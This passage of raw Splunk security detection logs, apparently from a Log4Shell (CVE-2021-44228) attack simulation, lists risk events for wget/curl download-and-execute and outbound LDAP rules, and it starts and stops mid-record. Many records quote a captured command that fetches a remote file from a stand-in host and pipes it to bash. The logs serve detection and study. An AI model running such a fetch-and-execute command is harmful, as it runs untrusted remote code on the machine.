This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642639416, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638101", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:21:41", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="8018", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", 
risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642639416, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638101", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:21:41", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="8018", process_name="dash", risk_message="An instance of dash was identified 
on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642639416, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633814", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:14", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO 
- http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7877", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642639416, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633814", info_max_time="+Infinity", 
info_min_time="0.000", lastTime="2022-01-19T23:10:14", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7877", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642639416, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", 
annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633812", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:12", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7870", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642639416, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool 
Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633812", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:12", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7870", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. 
This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642639416, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631700", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:35:00", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7798", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", 
risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642639416, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631700", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:35:00", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7798", process_name="dash", risk_message="An instance of dash was identified 
on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642639155, search_name="ESCU - Detect Outbound LDAP Traffic - Rule", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 12\",\"CIS 13\"],\"context\":[\"Source:Endpoint\",\"Stage:Initial Access\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Command and Control\",\"Actions on Objectives\"],\"mitre_attack\":[\"T1190\",\"T1059\"],\"nist\":[\"PR.DS\",\"PR.PT\",\"DE.AE\",\"DE.CM\"],\"observable\":[]}", annotations._all="T1059", annotations._all="DE.AE", annotations._all="Stage:Initial Access", annotations._all="Command and Control", annotations._all="T1190", annotations._all="CIS 12", annotations._all="PR.DS", annotations._all="CIS 13", annotations._all="Actions on Objectives", annotations._all="Log4Shell CVE-2021-44228", annotations._all="DE.CM", annotations._all="CVE-2021-44228", annotations._all="PR.PT", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 12", annotations.cis20="CIS 13", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Command and Control", 
annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1190", annotations.mitre_attack="T1059", annotations.nist="PR.DS", annotations.nist="PR.PT", annotations.nist="DE.AE", annotations.nist="DE.CM", dest_ip="0:0:0:0:0:ffff:a00:110", earliest_time="2022-01-19T22:34:59", info_max_time="+Infinity", info_min_time="0.000", latest_time="2022-01-20T00:21:41", risk_message="An outbound LDAP connection from 0:0:0:0:0:ffff:a00:114 in your infrastructure connecting to dest ip 0:0:0:0:0:ffff:a00:110", risk_object="0:0:0:0:0:ffff:a00:110", risk_object_type="system", risk_score="56.0", savedsearch_description="Malicious actors often abuse misconfigured LDAP servers or applications that use the LDAP servers in organizations. Outbound LDAP traffic should not be allowed outbound through your perimeter firewall. This search will help determine if you have any LDAP connections to IP addresses outside of private (RFC1918) address space.", src_ip="0:0:0:0:0:ffff:a00:114" 1642639155, search_name="ESCU - Detect Outbound LDAP Traffic - Rule", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 12\",\"CIS 13\"],\"context\":[\"Source:Endpoint\",\"Stage:Initial Access\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Command and Control\",\"Actions on Objectives\"],\"mitre_attack\":[\"T1190\",\"T1059\"],\"nist\":[\"PR.DS\",\"PR.PT\",\"DE.AE\",\"DE.CM\"],\"observable\":[]}", annotations._all="T1059", annotations._all="DE.AE", annotations._all="Stage:Initial Access", annotations._all="Command and Control", annotations._all="T1190", annotations._all="CIS 12", annotations._all="PR.DS", annotations._all="CIS 13", annotations._all="Actions on Objectives", annotations._all="Log4Shell CVE-2021-44228", annotations._all="DE.CM", annotations._all="CVE-2021-44228", annotations._all="PR.PT", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", 
annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 12", annotations.cis20="CIS 13", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Command and Control", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1190", annotations.mitre_attack="T1059", annotations.nist="PR.DS", annotations.nist="PR.PT", annotations.nist="DE.AE", annotations.nist="DE.CM", dest_ip="0:0:0:0:0:ffff:a00:110", earliest_time="2022-01-19T22:34:59", info_max_time="+Infinity", info_min_time="0.000", latest_time="2022-01-20T00:21:41", risk_message="An outbound LDAP connection from 0:0:0:0:0:ffff:a00:114 in your infrastructure connecting to dest ip 0:0:0:0:0:ffff:a00:110", risk_object="0:0:0:0:0:ffff:a00:114", risk_object_type="system", risk_score="56.0", savedsearch_description="Malicious actors often abuse misconfigured LDAP servers or applications that use the LDAP servers in organizations. Outbound LDAP traffic should not be allowed outbound through your perimeter firewall. 
This search will help determine if you have any LDAP connections to IP addresses outside of private (RFC1918) address space.", src_ip="0:0:0:0:0:ffff:a00:114" 1642639116, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638231", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:23:51", parent_process_id="8018", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="8020", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget 
on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642639116, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638231", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:23:51", parent_process_id="8018", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="8020", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", 
savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642639116, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633944", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:24", parent_process_id="7877", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7879", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it 
with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642639116, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633944", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:24", parent_process_id="7877", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7879", process_name="wget", risk_message="An instance of wget was 
identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642639116, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633942", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:22", parent_process_id="7870", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", 
process_id="7872", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642639116, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633942", 